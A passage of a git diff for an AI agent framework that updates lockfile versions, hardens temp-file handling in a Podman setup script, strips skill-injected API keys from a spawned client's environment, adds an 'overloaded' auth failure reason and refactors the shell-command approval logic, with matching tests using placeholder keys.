3.0.0-beta.1 birpc: 4.0.0 dts-resolver: 2.1.3 get-tsconfig: 4.13.6 obug: 2.1.1 - rolldown: 1.0.0-rc.5 + rolldown: 1.0.0-rc.7 optionalDependencies: - '@typescript/native-preview': 7.0.0-dev.20260301.1 + '@typescript/native-preview': 7.0.0-dev.20260307.1 typescript: 5.9.3 transitivePeerDependencies: - oxc-resolver - rolldown@1.0.0-rc.5: + rolldown@1.0.0-rc.7: dependencies: - '@oxc-project/types': 0.114.0 - '@rolldown/pluginutils': 1.0.0-rc.5 + '@oxc-project/types': 0.115.0 + '@rolldown/pluginutils': 1.0.0-rc.7 optionalDependencies: - '@rolldown/binding-android-arm64': 1.0.0-rc.5 - '@rolldown/binding-darwin-arm64': 1.0.0-rc.5 - '@rolldown/binding-darwin-x64': 1.0.0-rc.5 - '@rolldown/binding-freebsd-x64': 1.0.0-rc.5 - '@rolldown/binding-linux-arm-gnueabihf': 1.0.0-rc.5 - '@rolldown/binding-linux-arm64-gnu': 1.0.0-rc.5 - '@rolldown/binding-linux-arm64-musl': 1.0.0-rc.5 - '@rolldown/binding-linux-x64-gnu': 1.0.0-rc.5 - '@rolldown/binding-linux-x64-musl': 1.0.0-rc.5 - '@rolldown/binding-openharmony-arm64': 1.0.0-rc.5 - '@rolldown/binding-wasm32-wasi': 1.0.0-rc.5 - '@rolldown/binding-win32-arm64-msvc': 1.0.0-rc.5 - '@rolldown/binding-win32-x64-msvc': 1.0.0-rc.5 + '@rolldown/binding-android-arm64': 1.0.0-rc.7 + '@rolldown/binding-darwin-arm64': 1.0.0-rc.7 + '@rolldown/binding-darwin-x64': 1.0.0-rc.7 + '@rolldown/binding-freebsd-x64': 1.0.0-rc.7 + '@rolldown/binding-linux-arm-gnueabihf': 1.0.0-rc.7 + '@rolldown/binding-linux-arm64-gnu': 1.0.0-rc.7 + '@rolldown/binding-linux-arm64-musl': 1.0.0-rc.7 + '@rolldown/binding-linux-ppc64-gnu': 1.0.0-rc.7 + '@rolldown/binding-linux-s390x-gnu': 1.0.0-rc.7 + '@rolldown/binding-linux-x64-gnu': 1.0.0-rc.7 + '@rolldown/binding-linux-x64-musl': 1.0.0-rc.7 + '@rolldown/binding-openharmony-arm64': 1.0.0-rc.7 + '@rolldown/binding-wasm32-wasi': 1.0.0-rc.7 + '@rolldown/binding-win32-arm64-msvc': 1.0.0-rc.7 + '@rolldown/binding-win32-x64-msvc': 1.0.0-rc.7 rollup@4.59.0: dependencies: @@ -11803,6 +13188,10 @@ snapshots: transitivePeerDependencies: - supports-color + run-parallel@1.2.0: + dependencies: + queue-microtask: 1.2.3 + safe-buffer@5.1.2: {} safe-buffer@5.2.1: {} @@ -11999,7 +13388,7 @@ snapshots: skillflag@0.1.4: dependencies: - '@clack/prompts': 1.0.1 + '@clack/prompts': 1.1.0 tar-stream: 3.1.7 transitivePeerDependencies: - bare-abort-controller @@ -12165,6 +13554,8 @@ snapshots: dependencies: ansi-regex: 6.2.2 + strip-final-newline@2.0.0: {} + strip-json-comments@2.0.1: {} strnum@2.2.0: {} @@ -12177,6 +13568,8 @@ snapshots: dependencies: has-flag: 4.0.0 + supports-preserve-symlinks-flag@1.0.0: {} + table-layout@4.1.1: dependencies: array-back: 6.2.2 @@ -12230,10 +13623,16 @@ snapshots: tinyrainbow@3.0.3: {} + to-regex-range@5.0.1: + dependencies: + is-number: 7.0.0 + toad-cache@3.7.0: {} toidentifier@1.0.1: {} + token-stream@1.0.0: {} + token-types@6.1.2: dependencies: '@borewit/text-codec': 0.2.1 @@ -12257,24 +13656,24 @@ snapshots: ts-algebra@2.0.0: {} - tsdown@0.21.0-beta.2(@typescript/native-preview@7.0.0-dev.20260301.1)(typescript@5.9.3): + tsdown@0.21.0(@typescript/native-preview@7.0.0-dev.20260307.1)(typescript@5.9.3): dependencies: ansis: 4.2.0 - cac: 6.7.14 + cac: 7.0.0 defu: 6.1.4 empathic: 2.0.0 hookable: 6.0.1 import-without-cache: 0.2.5 obug: 2.1.1 picomatch: 4.0.3 - rolldown: 1.0.0-rc.5 - rolldown-plugin-dts: 0.22.2(@typescript/native-preview@7.0.0-dev.20260301.1)(rolldown@1.0.0-rc.5)(typescript@5.9.3) + rolldown: 1.0.0-rc.7 + rolldown-plugin-dts: 0.22.4(@typescript/native-preview@7.0.0-dev.20260307.1)(rolldown@1.0.0-rc.7)(typescript@5.9.3) semver: 7.7.4 tinyexec: 1.0.2 tinyglobby: 0.2.15 tree-kill: 1.2.2 unconfig-core: 7.5.0 - unrun: 0.2.28 + unrun: 0.2.30 optionalDependencies: typescript: 5.9.3 transitivePeerDependencies: @@ -12372,9 +13771,9 @@ snapshots: unpipe@1.0.0: {} - unrun@0.2.28: + unrun@0.2.30: dependencies: - rolldown: 1.0.0-rc.5 + rolldown: 1.0.0-rc.7 url-join@4.0.1: {} @@ -12413,7 +13812,7 @@ snapshots: '@types/unist': 3.0.3 vfile-message: 4.0.3 - vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2): + vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2): dependencies: esbuild: 0.27.3 fdir: 6.5.0(picomatch@4.0.3) @@ -12422,17 +13821,17 @@ snapshots: rollup: 4.59.0 tinyglobby: 0.2.15 optionalDependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 fsevents: 2.3.3 jiti: 2.6.1 lightningcss: 1.30.2 tsx: 4.21.0 yaml: 2.8.2 - vitest@4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.3)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2): + vitest@4.0.18(@opentelemetry/api@1.9.0)(@types/node@25.3.5)(@vitest/browser-playwright@4.0.18)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2): dependencies: '@vitest/expect': 4.0.18 - '@vitest/mocker': 4.0.18(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2)) + '@vitest/mocker': 4.0.18(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2)) '@vitest/pretty-format': 4.0.18 '@vitest/runner': 4.0.18 '@vitest/snapshot': 4.0.18 @@ -12449,12 +13848,12 @@ snapshots: tinyexec: 1.0.2 tinyglobby: 0.2.15 tinyrainbow: 3.0.3 - vite: 7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) + vite: 7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2) why-is-node-running: 2.3.0 optionalDependencies: '@opentelemetry/api': 1.9.0 - '@types/node': 25.3.3 - '@vitest/browser-playwright': 4.0.18(playwright@1.58.2)(vite@7.3.1(@types/node@25.3.3)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) + '@types/node': 25.3.5 + '@vitest/browser-playwright': 4.0.18(playwright@1.58.2)(vite@7.3.1(@types/node@25.3.5)(jiti@2.6.1)(lightningcss@1.30.2)(tsx@4.21.0)(yaml@2.8.2))(vitest@4.0.18) transitivePeerDependencies: - jiti - less @@ -12468,6 +13867,8 @@ snapshots: - tsx - yaml + void-elements@3.1.0: {} + web-streams-polyfill@3.3.3: {} webidl-conversions@3.0.1: {} @@ -12497,6 +13898,13 @@ snapshots: win-guid@0.2.1: {} + with@7.0.2: + dependencies: + '@babel/parser': 7.29.0 + '@babel/types': 7.29.0 + assert-never: 1.4.0 + babel-walk: 3.0.0-canary-5 + wordwrapjs@5.1.1: {} wrap-ansi@7.0.0: diff --git a/scripts/test-parallel.mjs b/scripts/test-parallel.mjs index 176737d7be3..d524fb87438 100644 --- a/scripts/test-parallel.mjs +++ b/scripts/test-parallel.mjs @@ -111,8 +111,17 @@ const useVmForks = const disableIsolation = process.env.OPENCLAW_TEST_NO_ISOLATE === "1"; const includeGatewaySuite = process.env.OPENCLAW_TEST_INCLUDE_GATEWAY === "1"; const includeExtensionsSuite = process.env.OPENCLAW_TEST_INCLUDE_EXTENSIONS === "1"; +const rawTestProfile = process.env.OPENCLAW_TEST_PROFILE?.trim().toLowerCase(); +const testProfile = + rawTestProfile === "low" || + rawTestProfile === "max" || + rawTestProfile === "normal" || + rawTestProfile === "serial" + ? rawTestProfile + : "normal"; +const shouldSplitUnitRuns = testProfile !== "low" && testProfile !== "serial"; const runs = [ - ...(useVmForks + ...(shouldSplitUnitRuns ? [ { name: "unit-fast", @@ -121,7 +130,7 @@ const runs = [ "run", "--config", "vitest.unit.config.ts", - "--pool=vmForks", + `--pool=${useVmForks ? "vmForks" : "forks"}`, ...(disableIsolation ? ["--isolate=false"] : []), ...unitIsolatedFiles.flatMap((file) => ["--exclude", file]), ], @@ -141,7 +150,14 @@ const runs = [ : [ { name: "unit", - args: ["vitest", "run", "--config", "vitest.unit.config.ts"], + args: [ + "vitest", + "run", + "--config", + "vitest.unit.config.ts", + `--pool=${useVmForks ? "vmForks" : "forks"}`, + ...(disableIsolation ? ["--isolate=false"] : []), + ], }, ]), ...(includeExtensionsSuite @@ -207,14 +223,7 @@ const silentArgs = const rawPassthroughArgs = process.argv.slice(2); const passthroughArgs = rawPassthroughArgs[0] === "--" ? rawPassthroughArgs.slice(1) : rawPassthroughArgs; -const rawTestProfile = process.env.OPENCLAW_TEST_PROFILE?.trim().toLowerCase(); -const testProfile = - rawTestProfile === "low" || - rawTestProfile === "max" || - rawTestProfile === "normal" || - rawTestProfile === "serial" - ? rawTestProfile - : "normal"; +const topLevelParallelEnabled = testProfile !== "low" && testProfile !== "serial"; const overrideWorkers = Number.parseInt(process.env.OPENCLAW_TEST_WORKERS ?? "", 10); const resolvedOverride = Number.isFinite(overrideWorkers) && overrideWorkers > 0 ? overrideWorkers : null; @@ -399,6 +408,23 @@ const run = async (entry) => { return 0; }; +const runEntries = async (entries) => { + if (topLevelParallelEnabled) { + const codes = await Promise.all(entries.map(run)); + return codes.find((code) => code !== 0); + } + + for (const entry of entries) { + // eslint-disable-next-line no-await-in-loop + const code = await run(entry); + if (code !== 0) { + return code; + } + } + + return undefined; +}; + const shutdown = (signal) => { for (const child of children) { child.kill(signal); @@ -451,8 +477,7 @@ if (passthroughArgs.length > 0) { process.exit(Number(code) || 0); } -const parallelCodes = await Promise.all(parallelRuns.map(run)); -const failedParallel = parallelCodes.find((code) => code !== 0); +const failedParallel = await runEntries(parallelRuns); if (failedParallel !== undefined) { process.exit(failedParallel); } diff --git a/setup-podman.sh b/setup-podman.sh index 8b9c5caab6c..95a4415487c 100755 --- a/setup-podman.sh +++ b/setup-podman.sh @@ -27,6 +27,48 @@ require_cmd() { fi } +is_writable_dir() { + local dir="$1" + [[ -n "$dir" && -d "$dir" && ! -L "$dir" && -w "$dir" && -x "$dir" ]] +} + +is_safe_tmp_base() { + local dir="$1" + local mode="" + local owner="" + is_writable_dir "$dir" || return 1 + mode="$(stat -Lc '%a' "$dir" 2>/dev/null || true)" + if [[ -n "$mode" ]]; then + local perm=$((8#$mode)) + if (( (perm & 0022) != 0 && (perm & 01000) == 0 )); then + return 1 + fi + fi + if is_root; then + owner="$(stat -Lc '%u' "$dir" 2>/dev/null || true)" + if [[ -n "$owner" && "$owner" != "0" ]]; then + return 1 + fi + fi + return 0 +} + +resolve_image_tmp_dir() { + if ! is_root && is_safe_tmp_base "${TMPDIR:-}"; then + printf '%s' "$TMPDIR" + return 0 + fi + if is_safe_tmp_base "/var/tmp"; then + printf '%s' "/var/tmp" + return 0 + fi + if is_safe_tmp_base "/tmp"; then + printf '%s' "/tmp" + return 0 + fi + printf '%s' "/tmp" +} + is_root() { [[ "$(id -u)" -eq 0 ]]; } run_root() { @@ -215,12 +257,18 @@ BUILD_ARGS=() podman build ${BUILD_ARGS[@]+"${BUILD_ARGS[@]}"} -t openclaw:local -f "$REPO_PATH/Dockerfile" "$REPO_PATH" echo "Loading image into $OPENCLAW_USER's Podman store..." -TMP_IMAGE="$(mktemp -p /tmp openclaw-image.XXXXXX.tar)" -trap 'rm -f "$TMP_IMAGE"' EXIT +TMP_IMAGE_DIR="$(resolve_image_tmp_dir)" +echo "Using temporary image dir: $TMP_IMAGE_DIR" +TMP_STAGE_DIR="$(mktemp -d -p "$TMP_IMAGE_DIR" openclaw-image.XXXXXX)" +TMP_IMAGE="$TMP_STAGE_DIR/image.tar" +chmod 700 "$TMP_STAGE_DIR" +trap 'rm -rf "$TMP_STAGE_DIR"' EXIT podman save openclaw:local -o "$TMP_IMAGE" -chmod 644 "$TMP_IMAGE" -(cd /tmp && run_as_user "$OPENCLAW_USER" env HOME="$OPENCLAW_HOME" podman load -i "$TMP_IMAGE") -rm -f "$TMP_IMAGE" +chmod 600 "$TMP_IMAGE" +# Stream the image into the target user's podman load so private temp directories +# do not need to be traversable by $OPENCLAW_USER. +cat "$TMP_IMAGE" | run_as_user "$OPENCLAW_USER" env HOME="$OPENCLAW_HOME" podman load +rm -rf "$TMP_STAGE_DIR" trap - EXIT echo "Copying launch script to $LAUNCH_SCRIPT_DST..." diff --git a/skills/notion/SKILL.md b/skills/notion/SKILL.md index 52b2ef5245d..f4152d23bf7 100644 --- a/skills/notion/SKILL.md +++ b/skills/notion/SKILL.md @@ -168,5 +168,7 @@ Common property formats for database items: - Page/database IDs are UUIDs (with or without dashes) - The API cannot set database view filters — that's UI-only -- Rate limit: ~3 requests/second average +- Rate limit: ~3 requests/second average, with `429 rate_limited` responses using `Retry-After` +- Append block children: up to 100 children per request, up to two levels of nesting in a single append request +- Payload size limits: up to 1000 block elements and 500KB overall - Use `is_inline: true` when creating data sources to embed them in pages diff --git a/src/acp/client.test.ts b/src/acp/client.test.ts index 72958ca57c2..bb5340115a1 100644 --- a/src/acp/client.test.ts +++ b/src/acp/client.test.ts @@ -60,6 +60,49 @@ describe("resolveAcpClientSpawnEnv", () => { }); expect(env.OPENCLAW_SHELL).toBe("acp-client"); }); + + it("strips skill-injected env keys when stripKeys is provided", () => { + const stripKeys = new Set(["OPENAI_API_KEY", "ELEVENLABS_API_KEY"]); + const env = resolveAcpClientSpawnEnv( + { + PATH: "/usr/bin", + OPENAI_API_KEY: "sk-leaked-from-skill", + ELEVENLABS_API_KEY: "el-leaked", + ANTHROPIC_API_KEY: "sk-keep-this", + }, + { stripKeys }, + ); + + expect(env.PATH).toBe("/usr/bin"); + expect(env.OPENCLAW_SHELL).toBe("acp-client"); + expect(env.ANTHROPIC_API_KEY).toBe("sk-keep-this"); + expect(env.OPENAI_API_KEY).toBeUndefined(); + expect(env.ELEVENLABS_API_KEY).toBeUndefined(); + }); + + it("does not modify the original baseEnv when stripping keys", () => { + const baseEnv: NodeJS.ProcessEnv = { + OPENAI_API_KEY: "sk-original", + PATH: "/usr/bin", + }; + const stripKeys = new Set(["OPENAI_API_KEY"]); + resolveAcpClientSpawnEnv(baseEnv, { stripKeys }); + + expect(baseEnv.OPENAI_API_KEY).toBe("sk-original"); + }); + + it("preserves OPENCLAW_SHELL even when stripKeys contains it", () => { + const env = resolveAcpClientSpawnEnv( + { + OPENCLAW_SHELL: "skill-overridden", + OPENAI_API_KEY: "sk-leaked", + }, + { stripKeys: new Set(["OPENCLAW_SHELL", "OPENAI_API_KEY"]) }, + ); + + expect(env.OPENCLAW_SHELL).toBe("acp-client"); + expect(env.OPENAI_API_KEY).toBeUndefined(); + }); }); describe("resolveAcpClientSpawnInvocation", () => { diff --git a/src/acp/client.ts b/src/acp/client.ts index 0cf9a194d88..54be5ffc455 100644 --- a/src/acp/client.ts +++ b/src/acp/client.ts @@ -348,8 +348,16 @@ function buildServerArgs(opts: AcpClientOptions): string[] { export function resolveAcpClientSpawnEnv( baseEnv: NodeJS.ProcessEnv = process.env, + options?: { stripKeys?: ReadonlySet }, ): NodeJS.ProcessEnv { - return { ...baseEnv, OPENCLAW_SHELL: "acp-client" }; + const env: NodeJS.ProcessEnv = { ...baseEnv }; + if (options?.stripKeys) { + for (const key of options.stripKeys) { + delete env[key]; + } + } + env.OPENCLAW_SHELL = "acp-client"; + return env; } type AcpSpawnRuntime = { @@ -450,7 +458,10 @@ export async function createAcpClient(opts: AcpClientOptions = {}): Promise ({ describe("serveAcpGateway startup", () => { let serveAcpGateway: typeof import("./server.js").serveAcpGateway; + function getMockGateway() { + const gateway = mockState.gateways[0]; + if (!gateway) { + throw new Error("Expected mocked gateway instance"); + } + return gateway; + } + + function captureProcessSignalHandlers() { + const signalHandlers = new Map void>(); + const onceSpy = vi.spyOn(process, "once").mockImplementation((( + signal: NodeJS.Signals, + handler: () => void, + ) => { + signalHandlers.set(signal, handler); + return process; + }) as typeof process.once); + return { signalHandlers, onceSpy }; + } + beforeAll(async () => { ({ serveAcpGateway } = await import("./server.js")); }); @@ -117,25 +137,14 @@ describe("serveAcpGateway startup", () => { }); it("waits for gateway hello before creating AgentSideConnection", async () => { - const signalHandlers = new Map void>(); - const onceSpy = vi.spyOn(process, "once").mockImplementation((( - signal: NodeJS.Signals, - handler: () => void, - ) => { - signalHandlers.set(signal, handler); - return process; - }) as typeof process.once); + const { signalHandlers, onceSpy } = captureProcessSignalHandlers(); try { const servePromise = serveAcpGateway({}); await Promise.resolve(); expect(mockState.agentSideConnectionCtor).not.toHaveBeenCalled(); - const gateway = mockState.gateways[0]; - if (!gateway) { - throw new Error("Expected mocked gateway instance"); - } - + const gateway = getMockGateway(); gateway.emitHello(); await vi.waitFor(() => { expect(mockState.agentSideConnectionCtor).toHaveBeenCalledTimes(1); @@ -159,11 +168,7 @@ describe("serveAcpGateway startup", () => { const servePromise = serveAcpGateway({}); await Promise.resolve(); - const gateway = mockState.gateways[0]; - if (!gateway) { - throw new Error("Expected mocked gateway instance"); - } - + const gateway = getMockGateway(); gateway.emitConnectError("connect failed"); await expect(servePromise).rejects.toThrow("connect failed"); expect(mockState.agentSideConnectionCtor).not.toHaveBeenCalled(); @@ -177,14 +182,7 @@ describe("serveAcpGateway startup", () => { token: undefined, password: "resolved-secret-password", }); - const signalHandlers = new Map void>(); - const onceSpy = vi.spyOn(process, "once").mockImplementation((( - signal: NodeJS.Signals, - handler: () => void, - ) => { - signalHandlers.set(signal, handler); - return process; - }) as typeof process.once); + const { signalHandlers, onceSpy } = captureProcessSignalHandlers(); try { const servePromise = serveAcpGateway({}); @@ -200,10 +198,7 @@ describe("serveAcpGateway startup", () => { password: "resolved-secret-password", }); - const gateway = mockState.gateways[0]; - if (!gateway) { - throw new Error("Expected mocked gateway instance"); - } + const gateway = getMockGateway(); gateway.emitHello(); await vi.waitFor(() => { expect(mockState.agentSideConnectionCtor).toHaveBeenCalledTimes(1); diff --git a/src/agents/auth-profiles.ensureauthprofilestore.test.ts b/src/agents/auth-profiles.ensureauthprofilestore.test.ts index 537cb9512d4..10655a9f502 100644 --- a/src/agents/auth-profiles.ensureauthprofilestore.test.ts +++ b/src/agents/auth-profiles.ensureauthprofilestore.test.ts @@ -130,7 +130,7 @@ describe("ensureAuthProfileStore", () => { profile: { provider: "anthropic", mode: "api_key", - apiKey: "sk-ant-alias", + apiKey: "sk-ant-alias", // pragma: allowlist secret }, expected: { type: "api_key", @@ -156,7 +156,7 @@ describe("ensureAuthProfileStore", () => { provider: "anthropic", type: "api_key", key: "sk-ant-canonical", - apiKey: "sk-ant-alias", + apiKey: "sk-ant-alias", // pragma: allowlist secret }, expected: { type: "api_key", @@ -210,7 +210,7 @@ describe("ensureAuthProfileStore", () => { anthropic: { provider: "anthropic", mode: "api_key", - apiKey: "sk-ant-legacy", + apiKey: "sk-ant-legacy", // pragma: allowlist secret }, }, null, diff --git a/src/agents/auth-profiles.markauthprofilefailure.test.ts b/src/agents/auth-profiles.markauthprofilefailure.test.ts index 865fbf87816..e5690f75c6a 100644 --- a/src/agents/auth-profiles.markauthprofilefailure.test.ts +++ b/src/agents/auth-profiles.markauthprofilefailure.test.ts @@ -114,6 +114,22 @@ describe("markAuthProfileFailure", () => { expect(reloaded.usageStats?.["anthropic:default"]?.cooldownUntil).toBe(firstCooldownUntil); }); }); + it("records overloaded failures in the cooldown bucket", async () => { + await withAuthProfileStore(async ({ agentDir, store }) => { + await markAuthProfileFailure({ + store, + profileId: "anthropic:default", + reason: "overloaded", + agentDir, + }); + + const stats = store.usageStats?.["anthropic:default"]; + expect(typeof stats?.cooldownUntil).toBe("number"); + expect(stats?.disabledUntil).toBeUndefined(); + expect(stats?.disabledReason).toBeUndefined(); + expect(stats?.failureCounts?.overloaded).toBe(1); + }); + }); it("disables auth_permanent failures via disabledUntil (like billing)", async () => { await withAuthProfileStore(async ({ agentDir, store }) => { await markAuthProfileFailure({ diff --git a/src/agents/auth-profiles.runtime-snapshot-save.test.ts b/src/agents/auth-profiles.runtime-snapshot-save.test.ts index 3cb3d238975..d9146a7b1ee 100644 --- a/src/agents/auth-profiles.runtime-snapshot-save.test.ts +++ b/src/agents/auth-profiles.runtime-snapshot-save.test.ts @@ -37,7 +37,7 @@ describe("auth profile runtime snapshot persistence", () => { const snapshot = await prepareSecretsRuntimeSnapshot({ config: {}, - env: { OPENAI_API_KEY: "sk-runtime-openai" }, + env: { OPENAI_API_KEY: "sk-runtime-openai" }, // pragma: allowlist secret agentDirs: [agentDir], }); activateSecretsRuntimeSnapshot(snapshot); diff --git a/src/agents/auth-profiles/oauth.test.ts b/src/agents/auth-profiles/oauth.test.ts index f5c29fe3c2a..05ccdb5af04 100644 --- a/src/agents/auth-profiles/oauth.test.ts +++ b/src/agents/auth-profiles/oauth.test.ts @@ -65,7 +65,7 @@ describe("resolveApiKeyForProfile config compatibility", () => { profileId, }); expect(result).toEqual({ - apiKey: "tok-123", + apiKey: "tok-123", // pragma: allowlist secret provider: "anthropic", email: undefined, }); @@ -124,7 +124,7 @@ describe("resolveApiKeyForProfile config compatibility", () => { }); // token ↔ oauth are bidirectionally compatible bearer-token auth paths. expect(result).toEqual({ - apiKey: "access-123", + apiKey: "access-123", // pragma: allowlist secret provider: "anthropic", email: undefined, }); @@ -145,7 +145,7 @@ describe("resolveApiKeyForProfile token expiry handling", () => { }), }); expect(result).toEqual({ - apiKey: "tok-123", + apiKey: "tok-123", // pragma: allowlist secret provider: "anthropic", email: undefined, }); @@ -165,7 +165,7 @@ describe("resolveApiKeyForProfile token expiry handling", () => { }), }); expect(result).toEqual({ - apiKey: "tok-123", + apiKey: "tok-123", // pragma: allowlist secret provider: "anthropic", email: undefined, }); @@ -231,7 +231,7 @@ describe("resolveApiKeyForProfile secret refs", () => { it("resolves api_key keyRef from env", async () => { const profileId = "openai:default"; const previous = process.env.OPENAI_API_KEY; - process.env.OPENAI_API_KEY = "sk-openai-ref"; + process.env.OPENAI_API_KEY = "sk-openai-ref"; // pragma: allowlist secret try { const result = await resolveApiKeyForProfile({ cfg: cfgFor(profileId, "openai", "api_key"), @@ -248,7 +248,7 @@ describe("resolveApiKeyForProfile secret refs", () => { profileId, }); expect(result).toEqual({ - apiKey: "sk-openai-ref", + apiKey: "sk-openai-ref", // pragma: allowlist secret provider: "openai", email: undefined, }); @@ -282,7 +282,7 @@ describe("resolveApiKeyForProfile secret refs", () => { profileId, }); expect(result).toEqual({ - apiKey: "gh-ref-token", + apiKey: "gh-ref-token", // pragma: allowlist secret provider: "github-copilot", email: undefined, }); @@ -315,7 +315,7 @@ describe("resolveApiKeyForProfile secret refs", () => { profileId, }); expect(result).toEqual({ - apiKey: "gh-ref-token", + apiKey: "gh-ref-token", // pragma: allowlist secret provider: "github-copilot", email: undefined, }); @@ -331,7 +331,7 @@ describe("resolveApiKeyForProfile secret refs", () => { it("resolves inline ${ENV} api_key values", async () => { const profileId = "openai:inline-env"; const previous = process.env.OPENAI_API_KEY; - process.env.OPENAI_API_KEY = "sk-openai-inline"; + process.env.OPENAI_API_KEY = "sk-openai-inline"; // pragma: allowlist secret try { const result = await resolveApiKeyForProfile({ cfg: cfgFor(profileId, "openai", "api_key"), @@ -348,7 +348,7 @@ describe("resolveApiKeyForProfile secret refs", () => { profileId, }); expect(result).toEqual({ - apiKey: "sk-openai-inline", + apiKey: "sk-openai-inline", // pragma: allowlist secret provider: "openai", email: undefined, }); @@ -381,7 +381,7 @@ describe("resolveApiKeyForProfile secret refs", () => { profileId, }); expect(result).toEqual({ - apiKey: "gh-inline-token", + apiKey: "gh-inline-token", // pragma: allowlist secret provider: "github-copilot", email: undefined, }); diff --git a/src/agents/auth-profiles/types.ts b/src/agents/auth-profiles/types.ts index d01e7a07d68..127a444939b 100644 --- a/src/agents/auth-profiles/types.ts +++ b/src/agents/auth-profiles/types.ts @@ -39,6 +39,7 @@ export type AuthProfileFailureReason = | "auth" | "auth_permanent" | "format" + | "overloaded" | "rate_limit" | "billing" | "timeout" diff --git a/src/agents/auth-profiles/usage.test.ts b/src/agents/auth-profiles/usage.test.ts index 8c499654b49..ffd6ec2daa7 100644 --- a/src/agents/auth-profiles/usage.test.ts +++ b/src/agents/auth-profiles/usage.test.ts @@ -177,6 +177,24 @@ describe("resolveProfilesUnavailableReason", () => { ).toBe("auth"); }); + it("returns overloaded for active overloaded cooldown windows", () => { + const now = Date.now(); + const store = makeStore({ + "anthropic:default": { + cooldownUntil: now + 60_000, + failureCounts: { overloaded: 2, rate_limit: 1 }, + }, + }); + + expect( + resolveProfilesUnavailableReason({ + store, + profileIds: ["anthropic:default"], + now, + }), + ).toBe("overloaded"); + }); + it("falls back to rate_limit when active cooldown has no reason history", () => { const now = Date.now(); const store = makeStore({ diff --git a/src/agents/auth-profiles/usage.ts b/src/agents/auth-profiles/usage.ts index e78a36db28c..733a96e13c4 100644 --- a/src/agents/auth-profiles/usage.ts +++ b/src/agents/auth-profiles/usage.ts @@ -9,6 +9,7 @@ const FAILURE_REASON_PRIORITY: AuthProfileFailureReason[] = [ "billing", "format", "model_not_found", + "overloaded", "timeout", "rate_limit", "unknown", @@ -35,7 +36,7 @@ export function resolveProfileUnusableUntil( } /** - * Check if a profile is currently in cooldown (due to rate limiting or errors). + * Check if a profile is currently in cooldown (due to rate limits, overload, or other transient failures). */ export function isProfileInCooldown( store: AuthProfileStore, @@ -508,7 +509,7 @@ export async function markAuthProfileFailure(params: { } /** - * Mark a profile as failed/rate-limited. Applies exponential backoff cooldown. + * Mark a profile as transiently failed. Applies exponential backoff cooldown. * Cooldown times: 1min, 5min, 25min, max 1 hour. * Uses store lock to avoid overwriting concurrent usage updates. */ diff --git a/src/agents/bash-tools.exec-host-gateway.ts b/src/agents/bash-tools.exec-host-gateway.ts index 04f88497843..49a958c9c5b 100644 --- a/src/agents/bash-tools.exec-host-gateway.ts +++ b/src/agents/bash-tools.exec-host-gateway.ts @@ -1,4 +1,3 @@ -import crypto from "node:crypto"; import type { AgentToolResult } from "@mariozechner/pi-agent-core"; import { addAllowlistEntry, @@ -20,11 +19,12 @@ import { registerExecApprovalRequestForHostOrThrow, } from "./bash-tools.exec-approval-request.js"; import { + createDefaultExecApprovalRequestContext, + resolveBaseExecApprovalDecision, resolveApprovalDecisionOrUndefined, resolveExecHostApprovalContext, } from "./bash-tools.exec-host-shared.js"; import { - DEFAULT_APPROVAL_TIMEOUT_MS, DEFAULT_NOTIFY_TAIL_CHARS, createApprovalSlug, emitExecSystemEvent, @@ -138,16 +138,24 @@ export async function processGatewayAllowlist( } if (requiresAsk) { - const approvalId = crypto.randomUUID(); - const approvalSlug = createApprovalSlug(approvalId); - const contextKey = `exec:${approvalId}`; + const { + approvalId, + approvalSlug, + contextKey, + noticeSeconds, + warningText, + expiresAtMs: defaultExpiresAtMs, + preResolvedDecision: defaultPreResolvedDecision, + } = createDefaultExecApprovalRequestContext({ + warnings: params.warnings, + approvalRunningNoticeMs: params.approvalRunningNoticeMs, + createApprovalSlug, + }); const resolvedPath = allowlistEval.segments[0]?.resolution?.resolvedPath; - const noticeSeconds = Math.max(1, Math.round(params.approvalRunningNoticeMs / 1000)); const effectiveTimeout = typeof params.timeoutSec === "number" ? params.timeoutSec : params.defaultTimeoutSec; - const warningText = params.warnings.length ? `${params.warnings.join("\n")}\n\n` : ""; - let expiresAtMs = Date.now() + DEFAULT_APPROVAL_TIMEOUT_MS; - let preResolvedDecision: string | null | undefined; + let expiresAtMs = defaultExpiresAtMs; + let preResolvedDecision = defaultPreResolvedDecision; // Register first so the returned approval ID is actionable immediately. const registration = await registerExecApprovalRequestForHostOrThrow({ @@ -184,24 +192,19 @@ export async function processGatewayAllowlist( return; } - let approvedByAsk = false; - let deniedReason: string | null = null; + const baseDecision = resolveBaseExecApprovalDecision({ + decision, + askFallback, + obfuscationDetected: obfuscation.detected, + }); + let approvedByAsk = baseDecision.approvedByAsk; + let deniedReason = baseDecision.deniedReason; - if (decision === "deny") { - deniedReason = "user-denied"; - } else if (!decision) { - if (obfuscation.detected) { - deniedReason = "approval-timeout (obfuscation-detected)"; - } else if (askFallback === "full") { - approvedByAsk = true; - } else if (askFallback === "allowlist") { - if (!analysisOk || !allowlistSatisfied) { - deniedReason = "approval-timeout (allowlist-miss)"; - } else { - approvedByAsk = true; - } + if (baseDecision.timedOut && askFallback === "allowlist") { + if (!analysisOk || !allowlistSatisfied) { + deniedReason = "approval-timeout (allowlist-miss)"; } else { - deniedReason = "approval-timeout"; + approvedByAsk = true; } } else if (decision === "allow-once") { approvedByAsk = true; diff --git a/src/agents/bash-tools.exec-host-node.ts b/src/agents/bash-tools.exec-host-node.ts index 74c740cc1da..b66a6ededf1 100644 --- a/src/agents/bash-tools.exec-host-node.ts +++ 